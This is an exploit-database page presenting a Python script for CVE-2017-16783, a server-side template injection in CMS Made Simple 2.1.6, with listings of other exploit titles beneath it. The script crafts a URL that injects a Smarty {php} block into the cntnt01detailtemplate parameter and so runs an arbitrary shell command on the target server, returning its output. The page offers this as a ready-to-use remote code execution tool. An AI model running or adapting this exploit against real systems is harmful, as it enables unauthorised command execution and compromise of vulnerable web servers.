Menu

Search for hundreds of thousands of exploits

"CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection"

Author

Exploit author

"Gurkirat Singh"

Platform

Exploit platform

php

Release date

Exploit published date

2020-10-26

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
# Exploit Title: CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection
# Google Dork: N/A
# Date: 11/10/2017
# Exploit Author: Gurkirat Singh <tbhaxor@gmail.com>
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: N/A
# Version: 2.1.6
# Tested on: Linux
# CVE : CVE-2017-16783
# POC : https://www.netsparker.com/blog/web-security/exploiting-ssti-and-xss-in-cms-made-simple/

PFA
-------
Gurkirat Singh
(tbhaxor <https://google.com/search?q=tbhaxor>)

from argparse import ArgumentParser, RawTextHelpFormatter
from urllib.parse import urlparse, parse_qs, urlencode, quote, unquote_plus
import requests as http
import re
from bs4 import BeautifulSoup, Tag
from huepy import *
parser = ArgumentParser(description="Exploit for CVE-2017-16783",
                        formatter_class=RawTextHelpFormatter)
parser.add_argument(
    "--target",
    "-t",
    help="complete remote target with protocol, host, path and query",
    required=True,
    dest="t")
parser.add_argument("--command",
                    "-c",
                    help="command to execute (default: whoami)",
                    default="whoami",
                    dest="c")
args = parser.parse_args()

print(info("Building malicious url"))
url = urlparse(args.t)
query = parse_qs(url.query)
query["cntnt01detailtemplate"] = [
    "string:{php}echo `echo tbhaxor;%s;echo tbhaxor`;{/php}" % args.c
]
query = {k: ",".join(v) for k, v in query.items()}
query = unquote_plus(urlencode(query, doseq=False))
_url = url.scheme + "://" + url.netloc + url.path + "?" + query
print(good("Done"))
print(info("Executing payload"))
r = http.get(_url)
html = BeautifulSoup(r.content.decode(), "html5lib")
main: Tag = html.find("article", {"id": "main"})
main = re.sub(r"^Home", "", main.text.strip()).replace("tbhaxor", "").strip()
print(good("Done"))
print(info("Result"))
print(main)
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2020-10-27 "Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)" webapps php "Gurkirat Singh"
2020-10-27 "Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)" webapps php "Gurkirat Singh"
2020-10-26 "CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection" webapps php "Gurkirat Singh" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected